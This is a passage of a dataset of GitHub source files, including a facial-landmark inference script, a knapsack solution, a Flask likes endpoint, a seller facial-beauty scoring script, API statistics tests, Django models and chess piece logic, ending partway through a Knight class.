+{"seq_id":"40596520489","text":"import os\nimport logging\nfrom solarvino.iterator import DirectoryIterator\nfrom solarvino.inference import KeypointInference\n\n\nclass Config:\n    device = 'CPU'\n\n    num_streams = ''\n    num_threads = None\n    num_infer_requests = 1\n\n    image_directory = '/Users/huangshangyu/Downloads/experiment/maskimage/Crowd_Human/No_Mask'\n    save_dir = '/Users/huangshangyu/Downloads/experiment/facekpt/tmp/inference'\n\n    model_dir = '/Users/huangshangyu/Projects/solarfresh/solarvino/assets/intel/landmarks-regression-retail-0009'\n    model_xml_path = os.path.join(model_dir, 'landmarks-regression-retail-0009.xml')\n    model_bin_path = os.path.join(model_dir, 'landmarks-regression-retail-0009.bin')\n\n\nif __name__ == '__main__':\n    logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',\n                        level=logging.INFO,\n                        datefmt='%Y-%m-%d %H:%M:%S')\n\n    config = Config()\n\n    data_generator = DirectoryIterator(directory=config.image_directory)\n    inferencer = KeypointInference(device=config.device,\n                                   num_streams=config.num_streams,\n                                   num_threads=config.num_threads,\n                                   num_infer_requests=config.num_infer_requests,)\n\n    inferencer \\\n        .load_model(model_xml_path=config.model_xml_path,\n                    model_bin_path=config.model_bin_path,) \\\n        
.inference(data_generator=data_generator, save_dir=config.save_dir)\n","repo_name":"solarfresh/solarvino","sub_path":"scripts/landmarks.py","file_name":"landmarks.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24319258021","text":"# Example: values = [60, 100, 120], weights = [10, 20, 30], capacity W = 50\n# Expected best value: 220 (take the 100 and 120 items, weights 20 + 30)\n\n# Possible approaches: DFS, greedy, dp\n# Scratch trace: capacity thresholds vs. best total value\n# [0, 1, 2, 3, 10...20...30...40...50]\n# [0, 0, 0, 0, 60 100 160 180 220]\n\n\n# a row num = the range of items we are considering\n# col num = the weight we are trying to fill\ndef knapsack(vals, wts, W):\n    dp = [[0 for _ in range(W + 1)] for _ in range(len(vals) + 1)]\n    for i in range(len(dp)):\n        for w in range(len(dp[0])):\n            if i == 0 or w == 0:\n                dp[i][w] = 0\n            # if curr item's wt is too large, we cant consider it for this curr wt\n            # so just refer to the value in the row above\n            elif wts[i - 1] > w:\n                dp[i][w] = dp[i - 1][w]\n            else:\n                # max of: best val while not considering the curr item and \n                # val of curr item + best while not considering the curr item at the remaining weight\n                dp[i][w] = max(vals[i-1] + dp[i - 1][w - wts[i - 1]], dp[i - 1][w])\n    return dp[-1][-1]\n\nprint (knapsack([60, 100, 120], [10, 20, 30], 50))","repo_name":"rjk79/Data-Structures-Algorithms-System-Design","sub_path":"geeksforgeeks/dynamic programming/01_knapsack.py","file_name":"01_knapsack.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"11087166685","text":"import time\nfrom typing import List\n\nfrom ..base.hyperionrequest import HyperionRequest\nfrom ...models.genshin.gacha import GachaInfo\n\n__all__ = (\"Gacha\",)\n\n\nclass Gacha:\n    GACHA_LIST_URL = \"https://webstatic.mihoyo.com/hk4e/gacha_info/cn_gf01/gacha/list.json\"\n    GACHA_INFO_URL = \"https://webstatic.mihoyo.com/hk4e/gacha_info/cn_gf01/%s/zh-cn.json\"\n\n    USER_AGENT = (\n        \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n        \"Chrome/90.0.4430.72 Safari/537.36\"\n    )\n\n    def __init__(self):\n        self.headers = {\n            \"User-Agent\": self.USER_AGENT,\n        }\n        self.client = HyperionRequest(headers=self.headers)\n        self.cache = {}\n        self.cache_ttl = 600\n\n    async def get_gacha_list_info(self) -> List[GachaInfo]:\n        if self.cache.get(\"time\", 0) + self.cache_ttl < time.time():\n            self.cache.clear()\n        cache = self.cache.get(\"gacha_list_info\")\n        if cache is not None:\n            return cache\n        req = await self.client.get(self.GACHA_LIST_URL)\n        data = [GachaInfo(**i) for i in req[\"list\"]]\n        self.cache[\"gacha_list_info\"] = data\n        self.cache[\"time\"] = time.time()\n        return data\n\n    async def get_gacha_info(self, gacha_id: str) -> dict:\n        cache = self.cache.get(gacha_id)\n        if cache is not None:\n            return cache\n        req = await self.client.get(self.GACHA_INFO_URL % gacha_id)\n        self.cache[gacha_id] = req\n        return req\n\n    async def close(self):\n        await self.client.shutdown()\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"modules/apihelper/client/components/gacha.py","file_name":"gacha.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"}
+{"seq_id":"30286221401","text":"from services import MatchingService\nimport json\n\n\nif __name__ == '__main__':\n    with open('searches.txt', 'r', encoding='utf-8') as file:\n        searches = [line.strip() for line in file]\n    \n    with open('properties.json', 'r', 
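# properties.json holds the property listings handed to MatchingService below\n              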
encoding='utf-8') as file:\n properties = json.load(file)\n\n matched_searches = MatchingService(\n searches=searches,\n properties=properties,\n ).match()\n\n assert matched_searches == [\n 'ciudad de méxico/cuauhtémoc',\n 'ciudad de méxico/cuauhtémoc/property_type__office,apartment/size__100_200/price__3000000_4000000/bedrooms_2/bathrooms_1',\n 'Chihuahua/Chihuahua/property_type__house,office/size__80',\n ]","repo_name":"CisEfrain/challenges-tl-neximo","sub_path":"second/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19729563881","text":"import csv\n\ndef parse_naves(filepath):\n with open(filepath) as f:\n content = f.readlines()\n \n content = [x.strip() for x in content]\n \n entries = {}\n\n i = -1\n state = \"find_entry\"\n current_entry = None\n current_text = None\n \n while True:\n i += 1\n if i >= len(content):\n break\n line = content[i]\n if len(line) == 0:\n continue\n\n if state == \"find_entry\":\n if line.isupper():\n if line == \"NAVES TOPICAL BIBLE\":\n continue\n else:\n current_entry = line.lower()\n state = \"find_text\"\n elif state == \"find_text\":\n if line.isupper():\n continue\n if line.isdigit():\n continue\n entries[current_entry] = line\n state = \"find_entry\"\n \n return entries\n\ndef read_topics(filepath):\n topics = []\n with open(filepath) as f:\n reader = csv.reader(f, delimiter = \",\")\n \n for line in reader:\n topic = line[0]\n topics.append(topic)\n return topics\n\ndef main():\n entries = parse_naves(\"../raw/naves.txt\")\n topics = read_topics(\"../ner_entities/topics.csv\")\n\n with open(\"../ner_entities/topics_annotated.csv\", \"w+\") as f:\n for topic in topics:\n if topic in entries:\n f.write(topic + \",\" + entries[topic] + \"\\n\")\n else:\n f.write(topic + \"\\n\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"jadielam/intent-ranking","sub_path":"code/data/scripts/naves_parsing.py","file_name":"naves_parsing.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37080669032","text":"#Program to find number is divisible by 5 or not\r\n#Business Logic\r\ndef Divisible(No):\r\n if(No%5==0):\r\n return True\r\n else:\r\n return False\r\n\r\n#Main Function\r\ndef main():\r\n print(\"Please Enter the Number\")\r\n Num = int(input())\r\n\r\n Return = Divisible(Num)\r\n\r\n if(Return == True):\r\n print(\"Given no is Divisible by 5\")\r\n else:\r\n print(\"Given no is not Divisible by 5\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\"\"\"\r\nInput - 50\r\nOutput - Given No is divisible by 5\r\n\"\"\"","repo_name":"shonty99/Python-Programs","sub_path":"Assign1.4.py","file_name":"Assign1.4.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8214252227","text":"from app import db\nfrom app.api import bp\nfrom app.models import Product, ProductUser\nfrom app.producer import publish\nfrom flask import abort, jsonify\nimport requests, json\n\n\n@bp.route('/products')\ndef index():\n queries = db.session.execute(db.select(Product)).fetchall()\n products = [query[0].serialized for query in queries]\n return jsonify(products)\n\n@bp.route('/products//like', methods=['POST'])\ndef like(id):\n req = requests.get('http://172.18.0.1:8000/api/user')\n data = req.json()\n\n try:\n product_user = 
ProductUser(user_id=data['id'], product_id=id)\n        db.session.add(product_user)\n        db.session.commit()\n\n        publish('product_liked', id)\n\n    except Exception:\n        abort(400, 'You already liked this product.')\n\n    return jsonify({\n        'message': 'success'\n    })\n\n\n","repo_name":"losmiv/microservices-proj","sub_path":"main/app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19535569051","text":"### 5miles facial beauty estimation\nimport os, sys, time, shutil, glob\nthreads = '8'\nos.environ[\"OMP_NUM_THREADS\"] = threads\nos.environ[\"OPENBLAS_NUM_THREADS\"] = threads\nos.environ[\"MKL_NUM_THREADS\"] = threads\nos.environ[\"VECLIB_MAXIMUM_THREADS\"] = threads\nos.environ[\"NUMEXPR_NUM_THREADS\"] = threads\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom PIL import Image\n\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.backends.cudnn as cudnn\n\nfrom utils import *\nfrom FBP5500.trained_models_for_pytorch import Nets\n\nclass FBPDataset(Dataset):\n    \n    def __init__(self, root, transform):\n        self.root = root\n        self.transform = transform\n    \n    def __len__(self):\n        return len(glob.glob(os.path.join(self.root, '*.jpg')))\n    \n    def __getitem__(self, index):\n        image_files = sorted([x.split('/')[-1] for x in glob.glob(f'{self.root}/*.jpg')])\n        image = Image.open(os.path.join(self.root, image_files[index])).convert('RGB')\n        if self.transform is not None:\n            image = self.transform(image)\n        return (image_files[index].split('.')[0], image)\n    \nif __name__ == '__main__':\n    \n    align_dir = 'aligned' # folder saving aligned faces\n    score_dir = 'scores' # folder for saving scores\n    assert os.path.exists(align_dir), 'Directory saving aligned face images does not exist!'\n    assert os.path.exists(score_dir), 'Directory saving scores does not exist!'\n    \n    device = 'cuda'\n\n    # net definition \n    net = Nets.AlexNet().to(device)\n\n    model_dict = net.state_dict()\n    pretrained_dict = torch.load(f\"{os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))}/FBP5500/trained_models_for_pytorch/models/alexnet.pth\", encoding='latin1')\n    pretrained_dict = {k: v for k, v in pretrained_dict['state_dict'].items() if k in model_dict}\n    model_dict.update(pretrained_dict)\n    net.load_state_dict(model_dict)\n\n    # evaluate\n    net.eval()\n\n    # loading data...\n    transform = transforms.Compose([\n        transforms.Resize(256),\n        transforms.CenterCrop(224),\n        transforms.ToTensor(),\n        transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),]) \n    test_dataset = FBPDataset(align_dir, transform)\n    test_loader = DataLoader(test_dataset, batch_size=8, num_workers=8, shuffle=False)\n\n    scores = []\n    t0 = time.time()\n    for i, (img_id, img) in enumerate(test_loader):\n        img = img.to(device) # (bs, 3, 224, 224)\n        with torch.no_grad():\n            score = net(img)\n        score_df = pd.DataFrame(score.cpu().detach().numpy(), columns=['beauty'])\n        score_df.insert(0, 'seller_ID', img_id)\n        scores.append(score_df)\n    scores_df = pd.concat(scores)\n    scores_df = scores_df.sort_values('seller_ID').reset_index(drop=True)\n    print(f'Time FBP5500: {round(time.time() - t0, 2)}s')\n\n    scores_df.to_csv(f'{score_dir}/seller_beauty.csv', sep='\\t', index=False)\n    
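# the tab-separated output pairs each seller_ID with its predicted beauty score\n    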
","repo_name":"xinyiyu/Smile_yxy","sub_path":"5miles_smile/code/estimate_beauty.py","file_name":"estimate_beauty.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074631468","text":"from base_class import BaseClass\nfrom datetime import datetime\nfrom dateutil import parser\nimport time\nimport pytz\nfrom tzlocal import get_localzone\n\nfrom resources.resources import warp, no_faces, several_faces\nfrom utils.common.switch import switch\n\nutc = pytz.timezone(get_localzone().zone)\n\n\ndef get_time(time_str):\n date_time = parser.parse(time_str)\n return date_time\n\n\ndef get_iso_format(t):\n return t.isoformat(\"T\")\n\n\nclass TestStatistic(BaseClass):\n start = None\n end = None\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.start = datetime.now(get_localzone()).replace(microsecond=0)\n\n time.sleep(2)\n person_id = TestStatistic.employer.api_client.createPerson(raiseError=True).body[\"person_id\"]\n descriptor_id = TestStatistic.employer.api_client.extractDescriptors(\n filename=warp,\n warpedImage=True, raiseError=True).body[\"faces\"][0][\"id\"]\n TestStatistic.employer.api_client.extractDescriptors(\n filename=no_faces)\n TestStatistic.employer.api_client.linkDescriptorToPerson(person_id, descriptor_id, raiseError=True)\n TestStatistic.employer.api_client.identify(personId=person_id, personIds=[person_id], raiseError=True)\n TestStatistic.employer.api_client.match(personId=person_id, descriptorIds=[descriptor_id],\n raiseError=True)\n TestStatistic.employer.api_client.verify(personId=person_id, descriptorId=descriptor_id, raiseError=True)\n TestStatistic.employer.api_client.search(descriptorIds=[descriptor_id],\n filename=warp,\n raiseError=True)\n TestStatistic.employer.api_client.search(descriptorIds=[descriptor_id],\n filename=several_faces,\n raiseError=False)\n TestStatistic.employer.api_client.search(descriptorIds=[descriptor_id],\n filename=no_faces,\n raiseError=False)\n cls.end = datetime.now(get_localzone()).replace(microsecond=0)\n time.sleep(1)\n TestStatistic.employer.api_client.match(personId=person_id, descriptorIds=[descriptor_id],\n raiseError=True)\n\n def test_statistic_by_period(self):\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(resource, {\"group_by\": \"1s\",\n \"time__lt\": get_iso_format(\n TestStatistic.end),\n \"time__gte\": get_iso_format(\n TestStatistic.start),\n })\n self.assertEqual(200, response.status_code)\n response_start_period = get_time(response.content[\"values\"][0][0])\n self.assertTrue(response_start_period >= TestStatistic.start,\n \"{}, {}\".format(response_start_period, TestStatistic.start))\n response_end_period = get_time(response.content[\"values\"][-1][0])\n self.assertTrue(response_end_period <= TestStatistic.end)\n\n def test_statistic_group_time(self):\n\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n for group_step in [\"s\", \"d\", \"w\", \"h\", \"m\"]:\n with self.subTest(group_step=group_step):\n response = TestStatistic.admin_client.get_statistic(resource,\n {\"group_by\": \"1{}\".format(group_step)\n })\n self.assertEqual(200, response.status_code)\n response_start_period = get_time(response.content[\"values\"][0][0])\n for case in switch(group_step):\n if case(\"w\"):\n self.assertEqual(0, 
response_start_period.hour)\n if case(\"d\"):\n self.assertEqual(0, response_start_period.hour)\n if case(\"h\"):\n self.assertEqual(0, response_start_period.minute)\n if case(\"m\"):\n self.assertEqual(0, response_start_period.second)\n if case(\"s\"):\n self.assertEqual(0, response_start_period.microsecond)\n if case():\n continue\n\n def test_statistic_by_account(self):\n\n for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n with self.subTest(resource=resource):\n accounts = [{\"account_id\": TestStatistic.employer.account_id, \"count\": 1},\n {\"account_id\": TestStatistic.employer2.account_id, \"count\": 0}]\n for account in accounts:\n response = TestStatistic.admin_client.get_statistic(resource,\n {\n \"account_id\": account[\"account_id\"]})\n self.assertEqual(200, response.status_code)\n if account[\"count\"]:\n self.assertTrue(len(response.content[\"values\"]) > 0)\n else:\n self.assertDictEqual({}, response.content)\n\n def test_statistic_by_matcing_resource(self):\n for resource in [\"search\", \"match\", \"identify\", \"verify\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(\"matching_success\",\n {\n \"account_id\": TestStatistic.employer.account_id,\n \"resource\": resource,\n \"group_by\": \"1ms\"\n })\n self.assertEqual(200, response.status_code)\n self.assertTrue(len(response.content[\"values\"]), 1)\n response = TestStatistic.admin_client.get_statistic(\"matching_success\",\n {\n \"account_id\": TestStatistic.employer.account_id,\n \"group_by\": \"1ms\"\n })\n self.assertEqual(200, response.status_code)\n self.assertTrue(len(response.content[\"values\"]), 4)\n\n def test_statistic_agregators(self):\n def test_count():\n for resource in [\"extract_success\", \"matching_success\"]:\n with self.subTest(resource=resource):\n response = TestStatistic.admin_client.get_statistic(resource, {\"aggregator\": \"count\",\n \"account_id\": TestStatistic.employer.account_id})\n self.assertEqual(200, response.status_code)\n for value in response.content[\"values\"]:\n for v in value[1:]:\n self.assertEqual(type(v), int)\n for column in response.content[\"columns\"][1:]:\n self.assertTrue(column.startswith(\"count\"))\n\n def test_max_min_mean():\n agregators = [{\"agregator\": \"max\", \"res\": {}}, {\"agregator\": \"min\", \"res\": {}},\n {\"agregator\": \"mean\", \"res\": {}}]\n for agregator in agregators:\n response = TestStatistic.admin_client.get_statistic(\"matching_success\",\n {\"aggregator\": agregator[\"agregator\"],\n \"account_id\": TestStatistic.employer.account_id})\n agregator[\"res\"] = response.content[\"values\"]\n for column in response.content[\"columns\"][1:]:\n self.assertTrue(column.startswith(agregator[\"agregator\"]))\n\n for i in range(len(agregators[0][\"res\"])):\n for j in range(len(agregators[0][\"res\"][1:])):\n self.assertTrue(agregators[0][\"res\"][i][j] > agregators[2][\"res\"][i][j])\n self.assertTrue(agregators[2][\"res\"][i][j] > agregators[1][\"res\"][i][j])\n\n test_count()\n test_max_min_mean()\n\n def test_other_params(self):\n params = [\n {\"name\": \"server\", \"value\": \"127.0.0.1\", \"resources\": [\"extract_success\", \"matching_success\", \"errors\"]},\n {\"name\": \"limit\", \"value\": 4, \"resources\": [\"matching_success\"]},\n {\"name\": \"template\", \"value\": 1, \"resources\": [\"matching_success\"]},\n {\"name\": \"candidate\", \"value\": 1, \"resources\": [\"matching_success\"]},\n {\"name\": \"count_faces\", \"value\": 3, \"resources\": 
[\"matching_success\"]}]\n        for param in params:\n            with self.subTest(param=param[\"name\"]):\n                for resource in param[\"resources\"]:\n                    with self.subTest(resource=resource):\n                        response = TestStatistic.admin_client.get_statistic(resource, {param[\"name\"]: param[\"value\"]})\n                        self.assertEqual(200, response.status_code)\n\n    def test_bad_params(self):\n        bad_params = [\n            {\"name\": \"aggregator\", \"value\": \"c\", \"resources\": [\"extract_success\", \"matching_success\", \"errors\"]},\n            {\"name\": \"group_by\", \"value\": \"3sec\", \"resources\": [\"extract_success\", \"matching_success\", \"errors\"]}]\n        for bad_param in bad_params:\n            with self.subTest(param_name=bad_param[\"name\"]):\n                for resource in bad_param[\"resources\"]:\n                    with self.subTest(resource=resource):\n                        self.badParamTests({bad_param[\"name\"]: bad_param[\"value\"]},\n                                           BaseClass.admin_client.get_statistic,\n                                           resource=resource)\n\n    def test_error_code(self):\n        errors = [{\"error_code\": 4003, \"count\": 2}, {\"error_code\": 11012, \"count\": 1}]\n        for error in errors:\n            with self.subTest(error_code=error[\"error_code\"]):\n                response = TestStatistic.admin_client.get_statistic(\"errors\", {\"aggregator\": \"count\",\n                                                                               \"account_id\": TestStatistic.employer.account_id,\n                                                                               \"error\": error[\"error_code\"],\n                                                                               \"group_by\": \"1d\"})\n                self.assertEqual(response.status_code, 200)\n                self.assertEqual(response.content[\"values\"][0][1], error[\"count\"])\n\n    def test_error_resource(self):\n        errors = [{\"resource\": \"descriptors\", \"count\": 1}, {\"resource\": \"search\", \"count\": 2}]\n        for error in errors:\n            with self.subTest(resource=error[\"resource\"]):\n                response = TestStatistic.admin_client.get_statistic(\"errors\", {\"aggregator\": \"count\",\n                                                                               \"account_id\": TestStatistic.employer.account_id,\n                                                                               \"resource\": error[\"resource\"],\n                                                                               \"group_by\": \"1d\"})\n                self.assertEqual(response.status_code, 200)\n                self.assertEqual(response.content[\"values\"][0][1], error[\"count\"])\n\n    def test_method_not_allowed(self):\n        for resource in [\"extract_success\", \"matching_success\", \"errors\"]:\n            with self.subTest(resource=resource):\n                self.methodNotAllowed(\"{}/realtime_statistics/{}\".format(TestStatistic.admin_client.url, resource),\n                                      [\"post\", \"put\", \"delete\", \"patch\"])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/tests/tests_api/statistic_test.py","file_name":"statistic_test.py","file_ext":"py","file_size_in_byte":12881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7235525221","text":"import sys\n\n# arguments\n\n# print(sys.argv[0]) # the executable name\n\n# print(sys.argv)\n\n\n# n = 0\nrep = 1\n\n# while n < rep:\n#     print(name)\n#     n += 1\n\ndef show_help():\n    print(\"\"\"Usage: script_name.py NAME REPS\n    \nNAME = the name to print\nREPS = how many times to print it\n\nOptions:\n    -h = Show this help\n\"\"\")\n    sys.exit(1)\n\nif len(sys.argv) > 1:\n    if sys.argv[1] == \"-h\":\n        show_help()\n    name = sys.argv[1]\nelse:\n    show_help()\n\nif len(sys.argv) > 2:\n    rep = int(sys.argv[2])\n\nfor i in range(rep):\n    print(name)","repo_name":"GeorgeWLF/it_school","sub_path":"S16/sys2.py","file_name":"sys2.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10652538006","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.core.management.utils import 
get_random_secret_key\n\n\nclass User(AbstractUser):\n    username = None\n    email = models.EmailField(unique=True, db_index=True , primary_key=True)\n    secret_key = models.CharField(max_length=255, default=get_random_secret_key)\n\n\n    USERNAME_FIELD = 'email'\n    REQUIRED_FIELDS = []\n\n    class Meta:\n        swappable = 'AUTH_USER_MODEL'\n\n    @property\n    def name(self):\n        \n        if not self.last_name:\n            return self.first_name.capitalize()\n\n        return f'{self.first_name.capitalize()} {self.last_name.capitalize()}'\n\nclass Profile(models.Model):\n    status_choices = (\n        ('S', 'Student'),\n        ('P', 'Professor')\n    )\n    first_name = models.CharField(max_length=200, null=True, blank=True)\n    last_name = models.CharField(max_length=200, null=True, blank=True)\n    email = models.OneToOneField(User, unique=True,on_delete=models.CASCADE)\n    # avatar = models.ImageField(upload_to='profile', blank = True)\n    avatar = models.CharField(max_length=200, null=True, blank=True)\n    status = models.CharField(\n        max_length=9, choices=status_choices) # Student / Professor\n    faculty = models.CharField(max_length=200, blank=True, null=False)\n\n    def __str__(self):\n        return self.email.email\n\n\nclass Project(models.Model):\n    name = models.CharField(max_length=200)\n    owner = models.ManyToManyField(Profile, related_name='own')\n    adviser = models.ManyToManyField(Profile, related_name='advice')\n    status = models.BooleanField(default=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Todo(models.Model):\n    title = models.CharField(max_length=120)\n    description = models.TextField()\n    completed = models.BooleanField(default=False)\n\n    def __str__(self):\n        return self.title","repo_name":"ittipat02/fixfixshit","sub_path":"server/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12745011160","text":"class Piece:\n    def __init__(self, game, data):\n        self.game = game\n        self.color = data['color']\n        # self.start_coords = start_coords\n        self._curr_coords = data['curr_coords']\n        self.curr_coords_str = ','.join([str(num) for num in data['curr_coords']])\n        self.times_moved = data['times_moved']\n        self.valid_moves = data['valid_moves']\n        self.id = data['id']\n\n    base_val = 0\n\n    @property\n    def curr_coords(self):\n        return self._curr_coords\n\n    @curr_coords.setter\n    def curr_coords(self, coords):\n        self._curr_coords = coords\n        self.curr_coords_str = ','.join([str(num) for num in coords])\n\n    def get_value(self):\n        return self.base_val\n\n    def to_dict(self):\n        return {\n            'id': self.id,\n            'color': self.color,\n            'curr_coords': self.curr_coords,\n            'times_moved': self.times_moved,\n            'valid_moves': self.valid_moves\n        }\n\n    def move(self, new_coords, piece=None):\n        [curr_row, curr_col] = self.curr_coords\n        [new_row, new_col] = new_coords\n        old_piece = self.game.board[new_row][new_col]\n\n        if old_piece:\n            del self.game.pieces[old_piece[:5]][old_piece]\n\n\n        self.game.board[curr_row][curr_col] = None\n        self.game.board[new_row][new_col] = self.id\n        self.curr_coords = new_coords\n        self.times_moved += 1\n        return False\n\n\n    def get_valid_moves(self):\n        res = []\n        visible_squares = self.get_line_of_sight()\n\n        for square in visible_squares:\n            [row, col] = square\n            if self.game.board[row][col]:\n                if self.game.board[row][col][:5] != self.color:\n                    res.append(square)\n            else:\n                res.append(square)\n\n        if self.game.checks:\n            if len(self.game.checks) > 1:\n                res = []\n            else:\n                valid = self.game.checks[0]\n                res = [square for square in 
res if square in valid]\n\n\n if self.game.pinned_pieces.get(self.curr_coords_str):\n res = [square for square in res if square in self.game.pinned_pieces[self.curr_coords_str]]\n\n self.valid_moves = res\n if res:\n self.game.valid_moves[self.curr_coords_str] = res\n return res\n\n\n\nclass LongRangePiece(Piece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n\n def get_line_of_sight(self):\n res = []\n\n for direction in self.directions:\n [rowDir, colDir] = direction\n [row, col] = self.curr_coords\n checkArr = [[row, col]]\n currEl = None\n\n while row+rowDir in range(8) and col+colDir in range(8) and (currEl is None):\n row += rowDir\n col += colDir\n\n currEl = self.game.board[row][col]\n res.append([row, col])\n if self.game.turn[1] == self.color:\n if self.color == 'white':\n enemy_king = self.game.kings['black']\n else:\n enemy_king = self.game.kings['white']\n\n if [row, col] == enemy_king.curr_coords:\n self.game.checks.append([*checkArr])\n else:\n checkArr.append([row,col])\n\n return res\n\n\n\nclass ShortRangePiece(Piece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n\n def get_line_of_sight(self):\n res = []\n [curr_row, curr_col] = self.curr_coords\n if self.color == 'white':\n enemy_king = self.game.kings['black']\n else:\n enemy_king = self.game.kings['white']\n for pair in self.pairs:\n [row, col] = pair\n row+=curr_row\n col+=curr_col\n\n if((row <= 7 and row >= 0) and (col <= 7 and col >= 0)):\n if ((self.game.turn[1] == self.color) and ([row, col] == enemy_king.curr_coords)):\n self.game.checks.append([[curr_row,curr_col]])\n\n res.append([row, col])\n\n return res\n\n\n\n\n\n\n\nclass Pawn(ShortRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n self.en_passantable = data['en_passantable']\n self.double_move = data['double_move']\n self.en_passant_move = data['en_passant_move']\n if self.color == 'black':\n self.pairs = [[1, -1], [1, 1]]\n elif self.color == 'white':\n self.pairs = [[-1, -1], [-1, 1]]\n\n base_val = 10\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'color': self.color,\n 'curr_coords': self.curr_coords,\n 'times_moved': self.times_moved,\n 'valid_moves': self.valid_moves,\n 'en_passantable': self.en_passantable,\n 'double_move': self.double_move,\n 'en_passant_move': self.en_passant_move\n }\n\n\n def move(self, new_coordinates, piece=None):\n upgrade_bool = False\n [curr_row, curr_col] = self.curr_coords\n [new_row, new_col] = new_coordinates\n old_piece = None\n old_piece_key = None\n if new_coordinates == self.double_move:\n self.en_passantable = True\n elif self.en_passant_move.get(','.join([str(num) for num in new_coordinates ])):\n old_piece_key = self.en_passant_move[','.join([str(num) for num in new_coordinates ])]\n old_piece = self.game.pieces[old_piece_key[:5]][old_piece_key]\n [oldRow, oldCol] = old_piece.curr_coords\n self.game.board[oldRow][oldCol] = None\n else:\n old_piece_key = self.game.board[new_row][new_col]\n if old_piece_key:\n old_piece = self.game.pieces[old_piece_key[:5]][old_piece_key]\n\n\n if (old_piece):\n del self.game.pieces[old_piece_key[:5]][old_piece_key]\n\n\n self.game.board[curr_row][curr_col] = None\n self.game.board[new_row][new_col] = self.id\n self.curr_coords = new_coordinates\n self.times_moved += 1\n\n if self.color == 'white' and self.curr_coords[0] == 0:\n upgrade_bool = True\n elif self.color == 'black' and self.curr_coords[0] == 7:\n upgrade_bool = True\n\n return upgrade_bool\n\n\n def get_valid_moves(self):\n 
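# Pawn state left over from previous turns (the double-move square and any\n        # recorded en-passant targets) is cleared here and rebuilt from the\n        # current board position on every call.\n        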
self.double_move = None\n self.en_passant_move = {}\n if self.color == self.game.turn[0]:\n self.en_passantable = False\n\n\n res = []\n visible_squares = self.get_line_of_sight()\n [curr_row, curr_col] = self.curr_coords\n first_square = None\n second_square = None\n if self.color == 'black':\n first_square = 1\n second_square = 2\n elif self.color == 'white':\n first_square = -1\n second_square = -2\n\n\n if self.game.board[curr_row+first_square][curr_col] == None:\n res.append([curr_row+first_square, curr_col])\n if self.times_moved == 0 and self.game.board[curr_row+second_square][curr_col] == None:\n res.append([curr_row+second_square, curr_col])\n self.double_move = [curr_row+second_square,curr_col]\n\n for square in visible_squares:\n [row, col] = square\n piece1 = self.game.board[row][col]\n piece2 = self.game.board[curr_row][col]\n if piece1 and piece1[:5] != self.color:\n res.append(square)\n\n elif piece2 and piece2[6:10] == 'pawn' and piece2[:5] != self.color and self.game.pieces[piece2[:5]][piece2].__getattribute__('en_passantable'):\n res.append(square)\n self.en_passant_move[','.join([str(num) for num in square])] = self.game.board[curr_row][col]\n\n\n if self.game.checks:\n if len(self.game.checks) > 1:\n res = []\n else:\n valid = self.game.checks[0]\n res = [square for square in res if square in valid]\n\n\n if self.game.pinned_pieces.get(self.curr_coords_str):\n res = [square for square in res if square in self.game.pinned_pieces[self.curr_coords_str]]\n\n\n self.valid_moves = res\n if res:\n self.game.valid_moves[self.curr_coords_str] = res\n return res\n\nclass Rook(LongRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n directions = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n base_val = 50\n\n\nclass Knight(ShortRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n 